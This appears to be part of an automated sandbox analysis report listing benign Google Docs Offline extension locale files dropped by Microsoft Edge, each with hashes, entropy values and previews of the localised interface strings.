                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
